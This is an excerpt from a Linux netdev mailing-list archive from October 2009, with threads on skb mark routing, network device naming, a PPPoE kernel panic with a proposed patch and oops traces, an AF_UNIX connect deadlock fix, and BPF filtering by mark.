To: Maciej Żenczykowski
Cc: David Miller, atis, netdev, panther, eric.dumazet, brian.haley
In-Reply-To: <55a4f86e0910141133y4decdeb4v43d9168687bbb724@mail.gmail.com>
Hi,
On Wed, Oct 14, 2009 at 11:33:39AM -0700, Maciej Żenczykowski wrote:
> > I don't agree. There are two route lookups with a tunnel, the
> > internal one and the tunnel one. Here is an example of what I'm
> > thinking:
> >
> > 1. Look up a route which points at a remote ip address via a tunnel device.
> > The "setmark" on this route sets the skb mark
>
> imho, this is much better done by having the mark setting performed
> explicitly by the tunnel device itself.
> That's also where we set ttl and qos (or inherit) on the outgoing packet.
>
Yes, I think (having looked at the code a bit more in the meantime)
that there is an argument for doing that. Although I still think that
setting the mark via the routing table would be a useful feature too.
> > 2. Look up a route on the tunnel itself (i.e. the tunnel endpoint not
> > the socket endpoint) using the mark from the initial lookup. This
> > route can depend on the previous lookup (if there are multiple
> > routes for multiple marks) and also set the mark to use.
>
> we would get the mark set by the tunneling module here.
>
> > The default would be to inherit the mark over a route lookup, in
> > case that no "setmark" had been specified for that route. In
> > other words, it would be the same as it is now.
>
> I'm not saying your solution wouldn't work, but I think it's less
> clean. I don't think marking should be inherited (in the general
> case) in case of packet wrapping (whether via gre, ipip, sit, or other
> methods).
>
I guess we could then say that inheriting the mark would not be the default
if the packet has gone through a device (whether virtual or physical).
That still seems ok to me since it's basically what happens currently,
I think.
> > The mark is supposed to be a generic thing, not just for routing
> > lookups, it can be used for classification, etc as well. I would
> > expect to see such a thing used for maybe specifying a VLAN or
> > a reference to an MPLS label stack, or something similar too,
>
> Right, the mark can currently (as far as I know) be set in one of two
> ways - either from the mangle table (and it can also be matched on in
> netfilter) or by using setsockopt(SO_MARK).
>
> Imagine a situation where you have a machine with routing already
> configured (pretty complex setup, tunnels, firewalls, etc) and you
> want to run a user space application that verifies (health-checks)
> some remote host (or something). As part of the health check you want
> to verify a particular route to the destination. This requires
> per-socket routing, which can (almost) be achieved by having proper
> routing (on fwmark) setup and using setsockopt(SO_MARK) on the health
> check socket in order to force specific routing. These health checks
> may then of course be feedback into the routing system (ie. if they
> fail the routing rules get modified). Note, that in particular we may
> want to be healthchecking routes that aren't even available in the
> default routing table (because they've currently been removed from the
> default table, because previous health checks failed).
>
> Maciej
Yes, that's a good use case. I think there are a lot of other potential
use cases too though. A while back when I was looking into MPLS I wondered
about using the mark to index into a set of outgoing label stacks. That
was the original reason that I thought setting the mark via the routing
table would be useful. I've not really had the time to continue my
MPLS investigations recently though :(
Another potential use case would be to segregate traffic into different
routing domains (and thus being able to change the mark when moving from
one routing domain to another might be useful).
Steve.
^ permalink raw reply
* RE: PATCH: Network Device Naming mechanism and policy
From: Narendra_K @ 2009-10-19 11:30 UTC (permalink / raw)
To: dannf, bhutchings
Cc: netdev, linux-hotplug, Matt_Domsch, Jordan_Hargrave, Charles_Rose
In-Reply-To: <20091016214024.GA10091@ldl.fc.hp.com>
>> > > And how would the regular file look like in terms of holding
>> > > ifindex of the interface, which can be passed to libnetdevname.
>> >
>> > I can't think of anything we need to store in the regular file. If
>> > we have the kernel name for the device, we can look up the ifindex
>> > in /sys. Correct me if I'm wrong, but storing it ourselves seems
>> > redundant.
>>
>> But the name of a netdev can change whereas its ifindex never does.
>> Identifying netdevs by name would require additional work to update
>> the links when a netdev is renamed and would still be prone to race
>> conditions. This is why Narendra and Matt were proposing to store the
>> ifindex in the node all along...
>
>Matt, Ben and I talked about a few other possibilities on IRC.
>The one I like the most at the moment is an idea Ben had to
>create dummy files named after the ifindex. Then, use symlinks
>for the kernel name and the various by-$property
>subdirectories. This means the KOBJ events will need to expose
>the ifindex.
>
I suppose the KOBJ events already expose the ifindex of a network
interface. The file "/sys/class/net/ethN/uevent" contains INTERFACE=ethN
and IFINDEX=n already. But it looks like udev doesn't use it in any way.
For example, with the kernel patch, "/sys/class/net/ethN/uevent" contains,
in addition to the above details, MAJOR=M and MINOR=m, which udev knows how
to make use of with a rule like
SUBSYSTEM=="net", KERNEL!="tun", NAME="netdev/%k", MODE="0600".
>I'm a novice at net programming, but I'm told that ifindex is
>the information apps ultimately require here.
Yes. libnetdevname retrieves the minor number of the device node by
"stat"ing the pathname. The minor number happens to be the ifindex of the
device, and it is mapped to the corresponding kernel name by an
"if_indextoname" call.
With regards,
Narendra K
^ permalink raw reply
* Re: [PATCH] Add sk_mark route lookup support for IPv4 listening sockets, and for IPv4 multicast forwarding
From: Atis Elsts @ 2009-10-19 11:38 UTC (permalink / raw)
To: steve
Cc: Maciej Żenczykowski, David Miller, netdev, panther,
eric.dumazet, brian.haley
In-Reply-To: <20091019082033.GB27230@fogou.chygwyn.com>
On Monday 19 October 2009 11:20:33 steve@chygwyn.com wrote:
>
> Another potential use case would be to segregate traffic into different
> routing domains (and thus being able to change the mark when moving from
> one routing domain to another might be useful).
I agree. Actually, one of our users recently requested adding a matcher to the
firewall that would match outgoing packets by the routing table that was
used to route them. (For now we found a workaround using tclassid, but that
requires manual configuration.) So yes, it's a useful feature even excluding
the tunnel cases.
I don't like the idea of using skb->mark for storing that information though,
because I think these multiple uses of the same field would be too confusing
for users, even if the default behavior remained the same as now. Also,
consider the case when someone wants to match packets in the postrouting chain
*both* by the mark that was set in the prerouting chain and by the routing
table used to route the packet.
There already is free space (padding fields) in struct dst_entry, so why not
use this space to store the routing table? Speed is also not an issue,
because the field only needs to be filled in the slowpath routing lookup, and
will be used only
1) if iptables are explicitly configured to match by it;
2) (?) in tunnel routing lookups. (no idea which is the best option here)
I see that struct rt6_info already has the field
struct fib6_table *rt6i_table
so this matcher can already be made for the IPv6 firewall. But IPv4 is still
more important at the moment :)
Atis
^ permalink raw reply
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Denys Fedoryschenko @ 2009-10-19 11:36 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Can you send me the patch as an attachment, please?
On Monday 19 October 2009 06:34:06 Michal Ostrowski wrote:
> Here's my theory on this after an initial look...
>
> Looking at the oops report and disassembly of the actual module binary
> that caused the oops, one can deduce that:
>
> Execution was in pppoe_flush_dev(). %ebx contained the pointer "struct
> pppox_sock *po", which is what we faulted on, executing "cmp %eax,
> 0x190(%ebx)". %ebx value was 0xffffffff (hence we got "NULL pointer
> dereference at 0x18f").
>
> At this point "i" (stored in %esi) is 15 (valid), meaning that we got a
> value of 0xffffffff in pn->hash_table[i].
>
> From this I'd hypothesize that the combination of dev_put() and
> release_sock() may have allowed us to free "pn". At the bottom of the loop
> we already recognize that since locks are dropped we're responsible for
> handling invalidation of objects, and perhaps that should be extended to
> "pn" as well.
> --
> Michal Ostrowski
> mostrows@gmail.com
>
>
> ---
> drivers/net/pppoe.c | 86 ++++++++++++++++++++++++++------------------------
> 1 files changed, 45 insertions(+), 41 deletions(-)
>
> diff --git a/drivers/net/pppoe.c b/drivers/net/pppoe.c
> index 7cbf6f9..720c4ea 100644
> --- a/drivers/net/pppoe.c
> +++ b/drivers/net/pppoe.c
> @@ -296,6 +296,7 @@ static void pppoe_flush_dev(struct net_device *dev)
>
> BUG_ON(dev == NULL);
>
> +restart:
> pn = pppoe_pernet(dev_net(dev));
> if (!pn) /* already freed */
> return;
> @@ -303,48 +304,51 @@ static void pppoe_flush_dev(struct net_device *dev)
> write_lock_bh(&pn->hash_lock);
> for (i = 0; i < PPPOE_HASH_SIZE; i++) {
> struct pppox_sock *po = pn->hash_table[i];
> + struct sock *sk;
>
> - while (po != NULL) {
> - struct sock *sk;
> - if (po->pppoe_dev != dev) {
> - po = po->next;
> - continue;
> - }
> - sk = sk_pppox(po);
> - spin_lock(&flush_lock);
> - po->pppoe_dev = NULL;
> - spin_unlock(&flush_lock);
> - dev_put(dev);
> -
> - /* We always grab the socket lock, followed by the
> - * hash_lock, in that order. Since we should
> - * hold the sock lock while doing any unbinding,
> - * we need to release the lock we're holding.
> - * Hold a reference to the sock so it doesn't disappear
> - * as we're jumping between locks.
> - */
> + while (po && po->pppoe_dev != dev) {
> + po = po->next;
> + }
>
> - sock_hold(sk);
> + if (po == NULL) {
> + continue;
> + }
>
> - write_unlock_bh(&pn->hash_lock);
> - lock_sock(sk);
> + sk = sk_pppox(po);
>
> - if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND)) {
> - pppox_unbind_sock(sk);
> - sk->sk_state = PPPOX_ZOMBIE;
> - sk->sk_state_change(sk);
> - }
> + spin_lock(&flush_lock);
> + po->pppoe_dev = NULL;
> + spin_unlock(&flush_lock);
>
> - release_sock(sk);
> - sock_put(sk);
> + dev_put(dev);
>
> - /* Restart scan at the beginning of this hash chain.
> - * While the lock was dropped the chain contents may
> - * have changed.
> - */
> - write_lock_bh(&pn->hash_lock);
> - po = pn->hash_table[i];
> - }
> + /* We always grab the socket lock, followed by the
> + * hash_lock, in that order. Since we should
> + * hold the sock lock while doing any unbinding,
> + * we need to release the lock we're holding.
> + * Hold a reference to the sock so it doesn't disappear
> + * as we're jumping between locks.
> + */
> +
> + sock_hold(sk);
> +
> + write_unlock_bh(&pn->hash_lock);
> + lock_sock(sk);
> +
> + if (sk->sk_state & (PPPOX_CONNECTED | PPPOX_BOUND)) {
> + pppox_unbind_sock(sk);
> + sk->sk_state = PPPOX_ZOMBIE;
> + sk->sk_state_change(sk);
> + }
> +
> + release_sock(sk);
> + sock_put(sk);
> +
> + /* Restart the flush process from the beginning. While
> + * the lock was dropped the chain contents may have
> + * changed, and sock_put may have made things go away.
> + */
> + goto restart;
> }
> write_unlock_bh(&pn->hash_lock);
> }
> --
> 1.6.3.3
>
> On Sun, Oct 18, 2009 at 4:02 PM, Denys Fedoryschenko <denys@visp.net.lb>
> wrote:
> > I have server running as pppoe NAS.
> > Tried to rename customers without dropping pppd connections first, got
> > panic after few seconds.
> > Panic triggerable at 2.6.30.4 and 2.6.31.4
> > pppoe users running on eth2
> > pppoe flags:
> > 1457 root /usr/sbin/pppoe-server -I eth2 -k -L 172.16.1.1 -R
> > 172.16.1.2 -N 253 -C gpzone -S gpzone
> >
> >
> > Commands sequence that i think triggered that:
> >
> > ip link set eth0 down
> > ip link set eth1 down
> > ip link set eth2 down
> > nameif etherx 00:16:76:8D:83:BA
> > nameif eth0 00:19:e0:72:4a:37
> > nameif eth1 00:19:e0:72:4a:4b
> >
> > ip addr flush dev eth0
> > ip addr flush dev eth1
> > ip addr add X.X.X.X/29 dev eth0
> > ip addr add 192.168.2.177/24 dev eth0
> > ip addr add 192.168.0.1/32 dev eth1
> > ip addr add 127.0.0.0/8 dev lo
> > #ip link set eth0 up
> > ip link set eth0 up
> > ip link set eth1 up
> > ip link set lo up
> > ip route add 0.0.0.0/0 via X.X.X.X
> >
> >
> > [ 103.428591] r8169: eth0: link up
> > [ 103.430360] r8169: eth1: link up
> > [ 113.361528] BUG: unable to handle kernel NULL pointer dereference at 0000018f
> > [ 113.361717] IP: [<f8868269>] pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.361853] *pdpt = 000000003411a001 *pde = 0000000000000000
> > [ 113.362012] Oops: 0000 [#1] SMP
> > [ 113.362166] last sysfs file: /sys/devices/virtual/vc/vcs3/dev
> > [ 113.362246] Modules linked in: netconsole configfs act_skbedit
> > sch_ingress sch_prio cls_flow cls_u32 em_meta cls_basic xt_dscp xt_DSCP
> > ipt_REJECT ts_bm xt_string xt_hl ifb cls_fw sch_tbf sch_htb act_ipt
> > act_mirred xt_MARK pppoe pppox ppp_generic slhc xt_TCPMSS xt_mark
> > xt_tcpudp iptable_mangle iptable_nat nf_nat rtc_cmos nf_conntrack_ipv4
> > rtc_core nf_conntrack rtc_lib nf_defrag_ipv4 iptable_filter ip_tables
> > x_tables 8021q garp stp llc loop sata_sil pata_atiixp pata_acpi
> > ata_generic libata 8139cp usb_storage mtdblock mtd_blkdevs mtd sr_mod
> > cdrom tulip r8169 sky2 via_velocity via_rhine sis900 ne2k_pci 8390 skge
> > tg3 libphy 8139too e1000 e100 usbhid ohci_hcd uhci_hcd ehci_hcd usbcore
> > nls_base
> > [ 113.362344]
> > [ 113.362344] Pid: 2858, comm: pppd Not tainted (2.6.31.4-build-0047 #7)
> > [ 113.362344] EIP: 0060:[<f8868269>] EFLAGS: 00010286 CPU: 0
> > [ 113.362344] EIP is at pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.362344] EAX: f4fbe000 EBX: ffffffff ECX: f6cea5a0 EDX: f7403680
> > [ 113.362344] ESI: 0000000f EDI: f6cea5e0 EBP: f4145e34 ESP: f4145e1c
> > [ 113.362344] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
> > [ 113.362344] Process pppd (pid: 2858, ti=f4145000 task=f4112ff0 task.ti=f4145000)
> > [ 113.362344] Stack:
> > [ 113.362344] f4fbe220 f4fbe000 f6cea5a0 f886a430 fffffff5 00000000 f4145e54 c01422b3
> > [ 113.362344] <0> f4fbe000 00000009 f8a457d8 f4fbe000 f8850190 00001091 f4145e64 c0142361
> > [ 113.362344] <0> ffffffff 00000000 f4145e74 c029ffbf f4fbe000 000010d0 f4145e90 c029fa70
> > [ 113.362344] Call Trace:
> > [ 113.362344] [<c01422b3>] ? notifier_call_chain+0x2b/0x4a
> > [ 113.362344] [<c0142361>] ? raw_notifier_call_chain+0xc/0xe
> > [ 113.362344] [<c029ffbf>] ? dev_close+0x4c/0x8c
> > [ 113.362344] [<c029fa70>] ? dev_change_flags+0xa5/0x158
> > [ 113.362344] [<c02da633>] ? devinet_ioctl+0x21a/0x503
> > [ 113.362344] [<c02db693>] ? inet_ioctl+0x8d/0xa6
> > [ 113.362344] [<c0292b21>] ? sock_ioctl+0x1c8/0x1ec
> > [ 113.362344] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.362344] [<c019af2b>] ? vfs_ioctl+0x22/0x69
> > [ 113.362344] [<c019b435>] ? do_vfs_ioctl+0x41f/0x459
> > [ 113.362344] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.362344] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.362344] [<c019b49b>] ? sys_ioctl+0x2c/0x45
> > [ 113.362344] [<c0102975>] ? syscall_call+0x7/0xb
> > [ 113.362344] Code: c9 00 00 00 89 c7 31 f6 83 c7 40 89 f8 e8 cc 60 a9 c7 8b 45 ec 05 20 02 00 00 89 45 e8 8b 4d f0 8b 1c b1 e9 8c 00 00 00 8b 45 ec
> > 83 90 01 00 00 74 08 8b 9b 8c 01 00 00 eb 79 b8 c0 a6 86 f8
> > [ 113.362344] EIP: [<f8868269>] pppoe_device_event+0x80/0x12c [pppoe] SS:ESP 0068:f4145e1c
> > [ 113.362344] CR2: 000000000000018f
> > [ 113.373124] ---[ end trace f6fe64a307e97f3b ]---
> > [ 113.373203] Kernel panic - not syncing: Fatal exception in interrupt
> > [ 113.373286] Pid: 2858, comm: pppd Tainted: G D 2.6.31.4-build-0047 #7
> > [ 113.373379] Call Trace:
> > [ 113.373479] [<c02fc496>] ? printk+0xf/0x11
> > [ 113.373561] [<c02fc3e7>] panic+0x39/0xd9
> > [ 113.373656] [<c01059b7>] oops_end+0x8b/0x9a
> > [ 113.373727] [<c0118f6d>] no_context+0x13d/0x147
> > [ 113.373800] [<c011908a>] __bad_area_nosemaphore+0x113/0x11b
> > [ 113.373881] [<c02953b3>] ? sock_alloc_send_pskb+0x8b/0x24a
> > [ 113.373959] [<c0121801>] ? __wake_up_sync_key+0x3b/0x45
> > [ 113.374030] [<c0131967>] ? irq_exit+0x39/0x5c
> > [ 113.374107] [<c0104393>] ? do_IRQ+0x80/0x96
> > [ 113.374183] [<c0102f49>] ? common_interrupt+0x29/0x30
> > [ 113.374259] [<c011909f>] bad_area_nosemaphore+0xd/0x10
> > [ 113.374348] [<c0119301>] do_page_fault+0x114/0x26f
> > [ 113.374526] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374605] [<c02fe506>] error_code+0x66/0x6c
> > [ 113.374683] [<c02d007b>] ? tcp_v4_send_ack+0xa3/0x10e
> > [ 113.374764] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374850] [<f8868269>] ? pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.374928] [<c01422b3>] notifier_call_chain+0x2b/0x4a
> > [ 113.375012] [<c0142361>] raw_notifier_call_chain+0xc/0xe
> > [ 113.375097] [<c029ffbf>] dev_close+0x4c/0x8c
> > [ 113.375169] [<c029fa70>] dev_change_flags+0xa5/0x158
> > [ 113.375239] [<c02da633>] devinet_ioctl+0x21a/0x503
> > [ 113.375318] [<c02db693>] inet_ioctl+0x8d/0xa6
> > [ 113.375411] [<c0292b21>] sock_ioctl+0x1c8/0x1ec
> > [ 113.375491] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.375574] [<c019af2b>] vfs_ioctl+0x22/0x69
> > [ 113.375653] [<c019b435>] do_vfs_ioctl+0x41f/0x459
> > [ 113.375734] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.375813] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.375884] [<c019b49b>] sys_ioctl+0x2c/0x45
> > [ 113.375960] [<c0102975>] syscall_call+0x7/0xb
> > [ 113.376041] Rebooting in 5 seconds..
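The "restart after dropping the lock" idea in the quoted patch can be modeled in userspace as below. This is only a sketch under simplifying assumptions: a pthread mutex stands in for hash_lock, entries are never freed, and all names (struct table, struct entry, flush_dev) are hypothetical. It is not the pppoe code and does not address why the panic persists.

```c
#include <pthread.h>
#include <stddef.h>

#define HASH_SIZE 16

struct entry {
	struct entry *next;
	const void *dev;	/* device this entry is bound to, or NULL */
};

struct table {
	pthread_mutex_t lock;
	struct entry *bucket[HASH_SIZE];
};

/*
 * Unbind every entry bound to dev. Each time the lock is dropped, the scan
 * starts over from the first bucket, because the chains may have changed
 * while the lock was not held. Returns the number of entries unbound.
 */
int flush_dev(struct table *t, const void *dev)
{
	struct entry *e;
	int unbound = 0;
	int i;

	if (dev == NULL)
		return 0;	/* NULL means "unbound"; nothing to flush */

restart:
	pthread_mutex_lock(&t->lock);
	for (i = 0; i < HASH_SIZE; i++) {
		for (e = t->bucket[i]; e != NULL; e = e->next)
			if (e->dev == dev)
				break;
		if (e == NULL)
			continue;

		e->dev = NULL;	/* claim the entry while still locked */
		pthread_mutex_unlock(&t->lock);

		/* Work that must not run under t->lock would go here. */
		unbound++;
		goto restart;
	}
	pthread_mutex_unlock(&t->lock);
	return unbound;
}
```

The loop terminates because every restart clears one binding, so a full pass that finds nothing eventually happens with the lock held.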
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Jarek Poplawski @ 2009-10-19 11:57 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
On 19-10-2009 08:02, Tomoki Sekiyama wrote:
...
> Why this happens:
> Error checks between unix_socket_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Despite the latter returns without doing anything when the
> socket is shutdown, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds shutdown check into unix_socket_connect(), so
> connect(2) to the shutdown socket will return -ECONREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
> ---
> net/unix/af_unix.c | 2 ++
> 1 files changed, 2 insertions(+), 0 deletions(-)
>
> diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
> index 51ab497..fc820cd 100644
> --- a/net/unix/af_unix.c
> +++ b/net/unix/af_unix.c
> @@ -1074,6 +1074,8 @@ restart:
> err = -ECONNREFUSED;
> if (other->sk_state != TCP_LISTEN)
> goto out_unlock;
> + if (other->sk_shutdown & RCV_SHUTDOWN)
> + goto out_unlock;
Isn't the shutdown call expected to change sk_state to TCP_CLOSE?
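One way to probe this from userspace is sketched below. It is not the PoC from the original report: the helper name connect_after_shutdown() and the abstract socket name passed to it are made up, and the result only shows what connect(2) returns on the running kernel, not the value of sk_state. With an empty backlog a single connect does not wait, so the probe should not trigger the hang.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/*
 * Hypothetical probe: listen on an abstract AF_UNIX address, shut the
 * listener down, then try to connect to it from a second socket.
 * Returns 0 if connect(2) succeeded, -errno otherwise.
 */
int connect_after_shutdown(const char *name)
{
	struct sockaddr_un sun;
	socklen_t len;
	size_t n = strlen(name);
	int lsd, csd, ret;

	if (n > sizeof(sun.sun_path) - 1)
		return -ENAMETOOLONG;

	memset(&sun, 0, sizeof(sun));
	sun.sun_family = AF_UNIX;
	/* sun_path[0] stays '\0': this selects the abstract namespace. */
	memcpy(sun.sun_path + 1, name, n);
	len = offsetof(struct sockaddr_un, sun_path) + 1 + n;

	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
	if (lsd < 0)
		return -errno;
	if (bind(lsd, (struct sockaddr *)&sun, len) < 0 || listen(lsd, 1) < 0) {
		ret = -errno;
		close(lsd);
		return ret;
	}
	shutdown(lsd, SHUT_RDWR);

	csd = socket(AF_UNIX, SOCK_STREAM, 0);
	if (csd < 0) {
		ret = -errno;
		close(lsd);
		return ret;
	}
	ret = connect(csd, (struct sockaddr *)&sun, len) < 0 ? -errno : 0;

	close(csd);
	close(lsd);
	return ret;
}
```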
Jarek P.
^ permalink raw reply
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Denys Fedoryschenko @ 2009-10-19 12:01 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Applied patch manually, still panic (maybe different now):
[ 42.596904]
[ 42.596904] Pid: 0, comm: swapper Not tainted (2.6.31.4-build-0047 #12)
[ 42.596904] EIP: 0060:[<f886865e>] EFLAGS: 00010286 CPU: 0
[ 42.596904] EIP is at pppoe_rcv+0x153/0x1be [pppoe]
[ 42.596904] EAX: 00003100 EBX: ffffffff ECX: 00000002 EDX: f74007cb
[ 42.596904] ESI: f79b4b00 EDI: f6332f00 EBP: c1806edc ESP: c1806eb8
[ 42.596904] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068
[ 42.596904] Process swapper (pid: 0, ti=c1806000 task=c03f6de0 task.ti=c03f1000)
[ 42.596904] Stack:
[ 42.596904] f7445000 00000004 f6fc0028 31000030 f6fc0030 f6332f40 f79b4b00 c0418140
[ 42.596904] <0> f886a444 c1806f14 c029e702 f7445000 f79b4bb0 f79b4bb0 c0418160 f7445000
[ 42.596904] <0> 00000000 00000001 64886f14 c02ac3ce f79b4b00 00000000 f753105c c1806f58
[ 42.596904] Call Trace:
[ 42.596904] [<c029e702>] ? netif_receive_skb+0x43b/0x45a
[ 42.596904] [<c02ac3ce>] ? eth_type_trans+0x25/0xa9
[ 42.596904] [<f840f736>] ? rtl8169_rx_interrupt+0x343/0x3f3 [r8169]
[ 42.596904] [<f8412191>] ? rtl8169_poll+0x2f/0x1b2 [r8169]
[ 42.596904] [<c01413e5>] ? hrtimer_run_pending+0x2d/0xa7
[ 42.596904] [<c029ec95>] ? net_rx_action+0x93/0x177
[ 42.596904] [<c0131bdd>] ? __do_softirq+0xa7/0x144
[ 42.596904] [<c0131b36>] ? __do_softirq+0x0/0x144
[ 42.596904] <IRQ>
[ 42.596904] [<c0131957>] ? irq_exit+0x29/0x5c
[ 42.596904] [<c0104393>] ? do_IRQ+0x80/0x96
[ 42.596904] [<c0102f49>] ? common_interrupt+0x29/0x30
[ 42.596904] [<c0108a3e>] ? mwait_idle+0x8a/0xb9
[ 42.596904] [<c0149613>] ? tick_nohz_restart_sched_tick+0x27/0x12f
[ 42.596904] [<c0101bf0>] ? cpu_idle+0x44/0x60
[ 42.596904] [<c02ef8c7>] ? rest_init+0x53/0x55
[ 42.596904] [<c04197df>] ? start_kernel+0x2b9/0x2be
[ 42.596904] [<c041906a>] ? i386_start_kernel+0x6a/0x6f
[ 42.596904] Code: 53 0a 32 53 0b 31 c2 c1 e8 08 31 c2 eb 08 0f b6 c2 c1 f8 04 31 c2 d1 e9 83 f9 04 74 f1 89 d0 83 e0 0f 8b 1c 87 eb 35 66 8b 45 ea
39 83 98 01 00 00 75 22 8b 55 e4 8d 83 9a 01 00 00 b9 06 00
[ 42.596904] EIP: [<f886865e>] pppoe_rcv+0x153/0x1be [pppoe] SS:ESP 0068:c1806eb8
[ 42.596904] CR2: 0000000000000197
[ 42.606148] ---[ end trace b477ff4ee072d9b9 ]---
[ 42.606209] Kernel panic - not syncing: Fatal exception in interrupt
[ 42.606273] Pid: 0, comm: swapper Tainted: G D 2.6.31.4-build-0047 #12
[ 42.606351] Call Trace:
[ 42.606413] [<c02fc496>] ? printk+0xf/0x11
[ 42.606474] [<c02fc3e7>] panic+0x39/0xd9
[ 42.606535] [<c01059b7>] oops_end+0x8b/0x9a
[ 42.606597] [<c0118f6d>] no_context+0x13d/0x147
[ 42.606658] [<c011908a>] __bad_area_nosemaphore+0x113/0x11b
[ 42.606722] [<c0121dc1>] ? check_preempt_wakeup+0x34/0x141
[ 42.606862] [<c01294bb>] ? try_to_wake_up+0x1aa/0x1b4
[ 42.606930] [<c0209541>] ? cpumask_next_and+0x26/0x37
[ 42.607003] [<c01256f5>] ? find_busiest_group+0x291/0x885
[ 42.607067] [<c019cf47>] ? pollwake+0x5a/0x63
[ 42.607127] [<c011909f>] bad_area_nosemaphore+0xd/0x10
[ 42.607189] [<c0119301>] do_page_fault+0x114/0x26f
[ 42.607251] [<c01191ed>] ? do_page_fault+0x0/0x26f
[ 42.607313] [<c02fe506>] error_code+0x66/0x6c
[ 42.607375] [<c02900d8>] ? pcibios_set_master+0x89/0x8d
[ 42.607436] [<c01191ed>] ? do_page_fault+0x0/0x26f
[ 42.607501] [<f886865e>] ? pppoe_rcv+0x153/0x1be [pppoe]
[ 42.607564] [<c029e702>] netif_receive_skb+0x43b/0x45a
[ 42.607625] [<c02ac3ce>] ? eth_type_trans+0x25/0xa9
[ 42.607691] [<f840f736>] rtl8169_rx_interrupt+0x343/0x3f3 [r8169]
[ 42.607759] [<f8412191>] rtl8169_poll+0x2f/0x1b2 [r8169]
[ 42.607824] [<c01413e5>] ? hrtimer_run_pending+0x2d/0xa7
[ 42.607886] [<c029ec95>] net_rx_action+0x93/0x177
[ 42.607948] [<c0131bdd>] __do_softirq+0xa7/0x144
[ 42.608022] [<c0131b36>] ? __do_softirq+0x0/0x144
[ 42.608082] <IRQ> [<c0131957>] ? irq_exit+0x29/0x5c
[ 42.608183] [<c0104393>] ? do_IRQ+0x80/0x96
[ 42.608245] [<c0102f49>] ? common_interrupt+0x29/0x30
[ 42.608307] [<c0108a3e>] ? mwait_idle+0x8a/0xb9
[ 42.608369] [<c0149613>] ? tick_nohz_restart_sched_tick+0x27/0x12f
[ 42.608431] [<c0101bf0>] ? cpu_idle+0x44/0x60
[ 42.608493] [<c02ef8c7>] ? rest_init+0x53/0x55
[ 42.608553] [<c04197df>] ? start_kernel+0x2b9/0x2be
[ 42.608616] [<c041906a>] ? i386_start_kernel+0x6a/0x6f
[ 42.608682] Rebooting in 5 seconds..
^ permalink raw reply
* Re: [PATCH][RFC]: ingress socket filter by mark
From: jamal @ 2009-10-19 12:12 UTC (permalink / raw)
To: Maciej Żenczykowski; +Cc: Eric Dumazet, netdev, David Miller, Atis Elsts
In-Reply-To: <55a4f86e0910181609o6b21d667g8e65638667a1d687@mail.gmail.com>
On Sun, 2009-10-18 at 16:09 -0700, Maciej Żenczykowski wrote:
>
> I agree that being able to filter on mark in bpf makes a lot of sense.
I agree as well - i posted a patch yesterday; i just tested it and it
works so i will formally post it shortly.
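As an illustration only, a classic BPF socket filter that accepts just the packets carrying a given mark could be built as below. It assumes the SKF_AD_MARK ancillary offset found in current <linux/filter.h>; this thread does not show the name used in the patch itself, and build_mark_filter() is a hypothetical helper.

```c
#include <linux/filter.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: fill prog[0..3] with a classic BPF program that
 * keeps a packet only if its skb mark equals the given value.
 */
void build_mark_filter(struct sock_filter prog[4], uint32_t mark)
{
	struct sock_filter code[4] = {
		/* A = skb->mark (ancillary load; assumes SKF_AD_MARK) */
		BPF_STMT(BPF_LD | BPF_W | BPF_ABS, SKF_AD_OFF + SKF_AD_MARK),
		/* if (A == mark) fall through, else skip one instruction */
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, mark, 0, 1),
		/* accept the whole packet */
		BPF_STMT(BPF_RET | BPF_K, 0xffffffff),
		/* drop the packet */
		BPF_STMT(BPF_RET | BPF_K, 0),
	};

	memcpy(prog, code, sizeof(code));
}
```

The program would be attached by pointing a struct sock_fprog (len = 4, filter = prog) at it and passing that to setsockopt() with SOL_SOCKET and SO_ATTACH_FILTER.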
> I wonder if we're not hitting the filters potentially before the mark
> is set though (on receive at least)...
> I'm nowhere near sure but I think packets get diverted/cloned to
> tcpdump before they hit the ip stack (and thus potentially get marked
> by ip(6)table mangle rules)
There are many ways to mark the packets before they get to the socket.
tc ingress provides at least two ways (ipt action and recently posted
patch by me on skbedit); iptables as well.
cheers,
jamal
^ permalink raw reply
* Re: Kernel oops when clearing bgp neighbor info with TCP MD5SUM enabled
From: Oleg Nesterov @ 2009-10-19 12:13 UTC (permalink / raw)
